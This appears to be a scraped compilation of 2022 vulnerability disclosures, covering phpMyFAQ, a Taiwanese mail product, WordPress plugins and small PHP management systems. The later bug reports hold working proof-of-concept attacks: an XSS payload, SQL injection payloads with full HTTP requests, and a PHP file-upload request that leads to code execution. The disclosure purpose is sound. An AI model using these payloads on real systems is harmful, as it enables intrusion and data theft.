Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.8.

**Description**

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

**Proof of Concept**

Visit: http://<ip>/phpmyfaq/admin/?action=meta Click button Add template meta data Inject payload in field Page type: "><script>alert("XSS")</script> and Save Every time you go to http://<ip>/phpmyfaq/admin/?action=meta, payload XSS will execute Image POC: https://drive.google.com/file/d/1iezIdmxcCBY8G714AUFGIm3fI145yiC1/view?usp=sharing

**Impact**

Attacker can inject Javascript steal cookie, deface website ....

CVE-2022-3765: Stored Cross-site scripting in phpmyfaq

Mail SQR Expert system has a Local File Inclusion vulnerability. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202210009

CVE ID

CVE-2022-40742

CVSS

6.5 (Medium)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

影響產品

中華數位科技 Mail SQR Expert 全方位電子郵件管理專家 version 2dut.190301

問題描述

Mail SQR Expert特定URL之參數存在 Local File Inclusion 漏洞，遠端攻擊者不須權限，可利用此漏洞引用部分系統目錄下的檔案，即可取得與修改部分系統資訊，但不會影響服務。

解決方法

Update 中華數位科技 Mail SQR Expert version to 2dut.220701 (此版號更新不包含運行在 FreeBSD 9.x的設備)

漏洞通報者

Cyku Hong (DEVCORE)

公開日期

2022-10-26

CVE-2022-40742: 中華數位科技 Mail SQR Expert 全方位電子郵件管理專家 - Local File Inclusion

phpMyFAQ prior to version 3.1.8 has Weak Password Requirements. Version 3.1.8 introduces an eight-character minimum password length.

**phpMyFAQ contains Weak Password Requirements**

High severity GitHub Reviewed Published Oct 29, 2022 • Updated Oct 31, 2022

GHSA-2rr3-rv49-p42f: phpMyFAQ contains Weak Password Requirements

Weak Password Requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.8.

@@ -845,14 +845,14 @@ public function startInstall(array $setup = null): void

$esSetup = \[\];

}

 

// check loginname

// check login name

if (!isset($setup\['loginname'\])) {

$loginName = Filter::filterInput(INPUT\_POST, 'loginname', FILTER\_UNSAFE\_RAW);

} else {

$loginName = $setup\['loginname'\];

}

if (is\_null($loginName)) {

echo 'Error: Please add a loginname for your account.';

echo 'Error: Please add a login name for your account.';

System::renderFooter(true);

}

 

@@ -863,8 +863,7 @@ public function startInstall(array $setup = null): void

$password = $setup\['password'\];

}

if (is\_null($password)) {

echo 'Error: Please add a password for the your ' .

'account.';

echo 'Error: Please add a password for your account.';

System::renderFooter(true);

}

 

@@ -873,16 +872,18 @@ public function startInstall(array $setup = null): void

} else {

$passwordRetyped = $setup\['password\_retyped'\];

}

 

if (is\_null($passwordRetyped)) {

echo 'Error: Please add a retyped password.';

System::renderFooter(true);

}

 

if (strlen($password) <= 5 || strlen($passwordRetyped) <= 5) {

if (strlen($password) <= 7 || strlen($passwordRetyped) <= 7) {

echo 'Error: Your password and retyped password are too ' .

'short. Please set your password and your retyped password with a minimum of 6 characters.';

System::renderFooter(true);

}

 

if ($password != $passwordRetyped) {

echo 'Error: Your password and retyped password are not ' .

'equal. Please check your password and your retyped password.';

CVE-2022-3754: fix: check for at least 8 characters for a password · thorsten/phpMyFAQ@d7a87d2

The Web Stories plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including 1.24.0 due to insufficient validation of URLs supplied via the 'url' parameter found via the /v1/hotlink/proxy REST API Endpoint. This made it possible for authenticated users to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

Wordfence is authorized by the Common Vulnerabilities and Exposures (CVE®) Program as a CNA, or CVE Numbering Authority. As a CNA, Wordfence assigns CVE IDs for new vulnerabilities in WordPress Core, WordPress Plugins and WordPress Themes.

Assigned CVE IDs and the vulnerability details are published below. For more information about submitting vulnerabilities to Wordfence for CVE ID assignment, please refer to our vulnerability disclosure policy.

This is a continuation of Vulnerability Advisories.

**Restaurant Menu – Food Ordering System – Table Reservation <= 2.3.0 – Missing Authorization on AJAX Actions**

The Restaurant Menu – Food Ordering System – Table Reservation plugin for WordPress is vulnerable to authorization bypass via several AJAX actions in versions up to, and including 2.3.0 due to missing capability checks and missing nonce validation. This makes it possible for authenticated attackers with minimal permissions to perform a wide variety of actions such as modifying the plugin’s settings and modifying the ordering system preferences.

**Restaurant Menu – Food Ordering System – Table Reservation <= 2.3.1 – Cross-Site Request Forgery**

The Restaurant Menu – Food Ordering System – Table Reservation plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3.1. This is due to missing or incorrect nonce validation on several functions called via AJAX actions such as forms\_action, set\_option, & chosen\_options to name a few . This makes it possible for unauthenticated attackers to perform a variety of administrative actions like modifying forms, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**Ultimate Member – User Profile, User Registration, Login & Membership Plugin <= 2.5.0 – Authenticated (Admin+) Limited Remote Code Execution via um\_populate\_dropdown\_options**

The Ultimate Member plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.5.0 via the populate\_dropdown\_options function that accepts user supplied input and passes it through call\_user\_func(). This is restricted to non-parameter PHP functions like phpinfo(); since user supplied parameters are not passed through the function. This makes it possible for authenticated attackers, with administrative privileges, to execute code on the server.

**Ultimate Member – User Profile, User Registration, Login & Membership Plugin <= 2.5.0 – Authenticated (Admin+) Remote Code Execution via Multi-Select**

The Ultimate Member plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.5.0 via the get\_option\_value\_from\_callback function that accepts user supplied input and passes it through call\_user\_func(). This makes it possible for authenticated attackers, with administrative capabilities, to execute code on the server.

**Ultimate Member – User Profile, User Registration, Login & Membership Plugin <= 2.5.0 – Authenticated (Contributor+) Directory Traversal via Shortcodes**

The Ultimate Member plugin for WordPress is vulnerable to directory traversal in versions up to, and including 2.5.0 due to insufficient input validation on the ‘template’ attribute used in shortcodes. This makes it possible for attackers with administrative privileges to supply arbitrary paths using traversal (../../) to access and include files outside of the intended directory. If an attacker can successfully upload a php file then remote code execution via inclusion may also be possible. Note: for users with less than administrative capabilities, /wp-admin access needs to be enabled for that user in order for this to be exploitable by those users.

**Ultimate Member – User Profile, User Registration, Login & Membership Plugin <= 2.5.0 – Authenticated (Admin+) Directory Traversal**

The Ultimate Member plugin for WordPress is vulnerable to directory traversal in versions up to, and including 2.5.0 due to insufficient input validation on the ‘pack’ parameter. This makes it possible for attackers with administrative privileges to supply arbitrary paths using traversal (../../) to access and include files outside of the intended directory. If an attacker can successfully upload a file with the exact name ‘init.php’ then remote code execution may also be possible.

**Web Stories <= 1.24.0 – Server Side Request Forgery**

**Affected Plugin:** Web Stories 
**Plugin Slug:** web-stories 
**Affected Versions:** <= 1.24.0 
**CVE ID:** CVE-2022-3708 
**CVSS Score:** 9.6 (Critical) 
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N 
**Researcher/s:** Aymen Borgi 
**Fully Patched Version:** 1.25.0 
**Recommended Remediation:** Update to version 1.25.0, or newer. 
**Publication Date:** 2022-10-26

The Web Stories plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including 1.24.0 due to insufficient validation of URLs supplied via the ‘url’ parameter found via the /v1/hotlink/proxy REST API Endpoint. This made it possible for authenticated users to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

**ImageMagick Engine <= 1.7.4 – Cross-Site Request Forgery to Remote Command Execution**

**Affected Plugin:** ImageMagick Engine 
**Plugin Slug:** imagemagick-engine 
**Affected Versions:** <= 1.7.4 
**CVE ID:** CVE-2022-2441 
**CVSS Score:** 8.8 (High) 
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 
**Researcher/s:** Rasoul Jahanshahi 
**Fully Patched Version:** Unpatched. 
**Recommended Remediation:** Uninstall plugin from site until patched version available. 
**Publication Date:** 2022-10-17

The ImageMagick Engine plugin for WordPress is vulnerable to remote code execution via the ‘cli\_path’ parameter in versions up to, and including 1.7.4. This makes it possible for unauthenticated users to run arbitrary commands leading to remote command execution, granted they can trick a site administrator into performing an action such as clicking on a link. This makes it possible for an attacker to create and or modify files hosted on the server which can easily grant attackers backdoor access to the affected server.

**Log HTTP Requests <= 1.3.1 – Stored Cross-Site Scripting**

**Affected Plugin:** Log HTTP Requests 
**Plugin Slug:** log-http-requests 
**Affected Versions:** <= 1.3.1 
**CVE ID:** CVE-2022-3402 
**CVSS Score:** 6.1 (Medium) 
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 
**Researcher/s:** Etan Imanol Castro Aldrete 
**Fully Patched Version:** 1.3.2 
**Recommended Remediation:** Update to version 1.3.2, or newer. 
**Publication Date:** 2022-10-05

The Log HTTP Requests plugin for WordPress is vulnerable to Stored Cross-Site Scripting via logged HTTP requests in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers who can trick a site’s administrator into performing an action like clicking on a link, or an authenticated user with access to a page that sends a request using user-supplied data via the server, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

**Bricks 1.2 – 1.5.3 – Remote Code Execution**

**Affected Theme:** Bricks 
**Theme Slug:** bricks 
**Affected Versions:** 1.2 to 1.5.3 
**CVE ID:** CVE-2022-3401 
**CVSS Score:** 8.8 (High) 
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 
**Researcher/s:** Anonymous 
**Fully Patched Version:** 1.5.4 
**Recommended Remediation:** Update to version 1.5.4, or newer. 
**Publication Date:** 2022-10-03

The Bricks theme for WordPress is vulnerable to remote code execution due to the theme allowing site editors to include executable code blocks in website content in versions 1.2 to 1.5.3. This, combined with the missing authorization vulnerability (CVE-2022-3400), makes it possible for authenticated attackers with minimal permissions, such as a subscriber, can edit any page, post, or template on the vulnerable WordPress website and inject a code execution block that can be used to achieve remote code execution.

**Bricks 1.0 – 1.5.3 – Missing Authorization to Arbitrary Content Creation/Modification**

**Affected Theme:** Bricks 
**Theme Slug:** bricks 
**Affected Versions:** 1.0 – 1.5.3 
**CVE ID:** CVE-2022-3400 
**CVSS Score:** 6.5 (Medium) 
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 
**Researcher/s:** Anonymous 
**Fully Patched Version:** 1.5.4 
**Recommended Remediation:** Update to version 1.5.4, or newer. 
**Publication Date:** 2022-10-03

The Bricks theme for WordPress is vulnerable to authorization bypass due to a missing capability check on the bricks\_save\_post AJAX action in versions 1.0 to 1.5.3. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to edit any page, post, or template on the vulnerable WordPress website.

CVE-2022-3708: Vulnerability Advisories Continued - Wordfence

The Log HTTP Requests plugin for WordPress is vulnerable to Stored Cross-Site Scripting via logged HTTP requests in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers who can trick a site's administrator into performing an action like clicking on a link, or an authenticated user with access to a page that sends a request using user-supplied data via the server, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2022-3402: Vulnerability Advisories Continued - Wordfence

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchOrderData.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchOrderData.php

Vulnerability location: /youthappam/php\_action/fetchOrderData.php, userid

dbname =youthappam,length=10

\[+\] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place ---> userid

POST /youthappam/php\_action/fetchOrderData.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

 \*\*# Canteen Management System v1.0 by mayuri\_k has SQL injection

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchOrderData.php

Vulnerability location: /youthappam/php\_action/fetchOrderData.php, userid

dbname =youthappam,length=10

\[+\] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place ---> userid

POST /youthappam/php\_action/fetchOrderData.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

 \*\*

CVE-2022-43232: bug_report/SQLi-2.md at main · HKD01l/bug_report

Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/manage_website.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Canteen Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/youthappam/manage\_website.php

Loophole location: Canteen Management System's manage\_website.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /youthappam/manage\_website.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/youthappam/manage\_website.php
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13868104343107
Content-Length: 1811
\-----------------------------13868104343107
Content-Disposition: form-data; name="title"
Admin Panel by 
\-----------------------------13868104343107
Content-Disposition: form-data; name="footer"
Admin PanelÃ�Â 
\-----------------------------13868104343107
Content-Disposition: form-data; name="short\_title"
9090908080
\-----------------------------13868104343107
Content-Disposition: form-data; name="currency\_code"
India
\-----------------------------13868104343107
Content-Disposition: form-data; name="currency\_symbol"
Ã¢â��Â¹
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_website\_image"
shell.php
\-----------------------------13868104343107
Content-Disposition: form-data; name="website\_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_invoice\_image"
logo.jpg
\-----------------------------13868104343107
Content-Disposition: form-data; name="invoice\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_login\_image"
logo.png
\-----------------------------13868104343107
Content-Disposition: form-data; name="login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------13868104343107
Content-Disposition: form-data; name="old\_back\_login\_image"
logo.jpg
\-----------------------------13868104343107
Content-Disposition: form-data; name="back\_login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------13868104343107
Content-Disposition: form-data; name="btn\_web"
\-----------------------------13868104343107--

The files will be uploaded to this directory \\youthappam\\assets\\uploadImage\\Logo\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43231: bug_report/RCE-1.md at main · HKD01l/bug_report

Barangay Management System v1.0 was discovered to contain a SQL injection vulnerability via the hidden_id parameter at /clearance/clearance.php.

Permalink

**Barangay Management System v1.0 by itsourcecode.com has SQL injection**

BUG\_Author: QiaoRui feng

The decompression password for the source file is itsourcecode.

Login account: admin/admin (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/barangay-management-system-project-in-php-with-source-code/

Vulnerability File: /bmis/pages/clearance/clearance.php

Vulnerability location: /bmis/pages/clearance/clearance.php,hidden\_id

\[+\] Payload: hidden\_id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> hidden\_id

POST /bmis/pages/clearance/clearance.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/bmis/pages/clearance/clearance.php
Cookie: sessions=aj0k5o11d743ingah9kp1b0ejntrqer6; PHPSESSID=fbu82ocu8kd37b5b20uqq71a35; \_ga=GA1.1.1382961971.1655097107; \_gid=GA1.1.804632123.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
hidden\_id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&txt\_edit\_cnum=1&txt\_edit\_findings=1&txt\_edit\_purpose=1&txt\_edit\_ornum=1&txt\_edit\_amount=1&btn\_save=Save&table\_length=10&table1\_length=10

CVE-2022-43228: bug_report/SQLi-1.md at main · HKD01l/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchSelectedUser.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchSelectedUser.php

Vulnerability location: /youthappam/php\_action/fetchSelectedUser.php, userid

dbname =youthappam,length=10

\[+\] Payload: userid=-1 union select 1,database(),3,4 // Leak place ---> userid

POST /youthappam/php\_action/fetchSelectedUser.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
userid=-1 union select 1,database(),3,4

Tag

#php